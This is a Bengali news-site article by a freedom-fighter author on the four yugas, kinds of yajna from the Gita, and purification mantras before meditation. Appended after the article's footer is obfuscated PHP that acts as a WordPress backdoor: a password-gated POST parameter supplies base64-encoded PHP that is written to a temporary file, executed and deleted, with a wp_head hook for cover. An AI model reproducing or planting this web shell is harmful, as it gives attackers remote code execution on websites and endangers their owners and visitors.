চারি যুগের কথা

admin
  • আপডেট টাইম : আগস্ট ৩০ ২০২২, ২০:৪৭
  • 641 বার পঠিত
চারি যুগের কথা

-গৌর প্রসাদ রায়-
সত্য, ক্রেতা, দ্রাপর, কলি। চারি যুগ। লোকে বলে তিন যোগ চলিতেছে, বর্তমান যুগের নাম কুল যুগ। কলি কালে যজ্ঞ ছাড়া অন্য দিকে যজ্ঞ, সাধন ভজন যাগ-যজ্ঞ, হোমদি কিস্থিই-নাই। কিন্তু গীতার বানীতে বলে আছে ভগবান স্বমুখে বলে গেছেন।
দ্রব্য যজ্ঞাপ্তপোষজ্ঞ। যোগ যজ্ঞাপ্তআপরে।
স্বধ্যায় জ্ঞানযজ্ঞাশ্চ যতয়ঃসংশিত ব্রতাঃ।
ভগবান বলে গেছেন অর্থ্যাৎ
দ্রব্য যজ্ঞ কর তপোযজ্ঞকর যোগ যজ্ঞকর-সাধন ভজন করা। ২৮/৪র্থ অধ্যায়।
১। দ্রব্য যজ্ঞ মাটিতে কুন্ড করে তাতে কাষ্ট ধৃত বিলুপ্তত্রাদি অগ্নি পজ্জাগিত করে যাহা করা হয় তাহাই দ্রব্য যজ্ঞ।
২। তপোযজ্ঞ তপস্য করাকেই তপোযজ্ঞ বলে ধ্যান করা।
৩। যোগ যজ্ঞ-যোগীরা যাহা করে থাকে অর্থ্যাৎ মনে আর প্রাণে যোগ করা। মমাক ফটস্থে লাগাইয়া দেওয়া।
৪। স্বাধ্যায়-গীতা ভগবত, রসায়ন, মহাভারত, ধর্মগ্রন্থ পাঠ করাকে স্বাধ্যায় বলে। যাদের কুসংস্কার আছে, কুবৃত্তি আছে, কুকর্ম আছে, কুমতি আছে, হিংসা, নিন্দা, অভিমান, দÐ, দর্প,অহংকার, মিরাবাস্ত থাকে তাহারাই কলির লোক। তাদের নাম যজ্ঞ ছাড়া অন্য কিছুই নাই। সাধন ভজনে তাদের মন আকৃষ্ট হইবে না। আর যাহারা সততা বজায় রেখে চলে নিষ্ঠাবান, দয়াবান, ভক্তিমান, আত্মসংযোমি, ইন্দ্রিয়জয়ী, তপস্বী, যোগি পরায়ন, সত্যাশ্রয়ী, তাহারা সত্যের লোক।
অতএব, তাহাদেও জন্য যাগ যজ্ঞ সাধন ভজন সবই আছে।
তাই নিজ নিজ গুরু প্রদত্ত দীক্ষা মন্ত্র শুদ্ধ আসনে বসে প্রথমে কুশায়ন তার উপরে কাপড়ের আসন পেতে। দেহশুদ্ধ ও আসন শুদ্ধ করে মনকে একাগ্র করে দেহশুদ্ধ, মন্ত্র-ওঁ হরি ওঁ তৎসত (৩) বার ওঁ অপবিত্র। পবিত্রোবা সর্বাবস্থাং গতোস্থপিবা যঃপুরেং পুস্তরীকাক্ষাংস বাহ্যাভান্তরঃ শুচিঃ ওঁ হরি ওঁ সৎসত (ত) বার
আসল শুদ্ধি ওঁ কমলাস নয় নমঃ (৩) বার পরে আসনে ধার পাঠ করিবেন।
মেরুপুষ্ঠঋষিঃ সুতঃ ইন্দ্রঃ কুর্ম্মেদেবতা আসন পরিগ্রাহনে বিলিযোগঃ ওঁ পুথ্বিত্বয়া ধুতা লোকা দেবিত্বং বিষ্ণুনা ধৃত ।।
তৃষ্ণ ধারয় সাং নিতাং পবিত্রং আসনাং করু।
মনকে একাগ্র করে দুই ভ্রাম্মেও মধ্যে এনে নিরব স্থানে শান্ত পরিবেশে ধ্যান করিলে অভ্যাস দ্বারা ধ্যান মগ্ন আসিবে। এই নাম হৃদয়ে ও কন্ঠে স্থান করে নিবে। তাই ধ্যান সাধন ভজন করুন।
সুধীগন আমার অনধিকারস্বর্চ্চার দোষ ত্রæটি মার্জ্জনা করিবেন, আগামীতে আপনাদের সহযোগিতা পাইলে আরও লিখার ইচ্ছা আছে।

লেখক-
গৌর প্রসাদ রায় (বীর মুক্তিযোদ্ধা)
সভাপতি-সেক্টর কমান্ডার ফোরাম, হবিগঞ্জ জেলা শাখা ও সাবেক ডেপুটি ইউনিট কমান্ডার, হবিগঞ্জ জেলা মুক্তিযোদ্ধা সংসদ।

0Shares
এই ক্যাটাগরীর আরো খবর
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}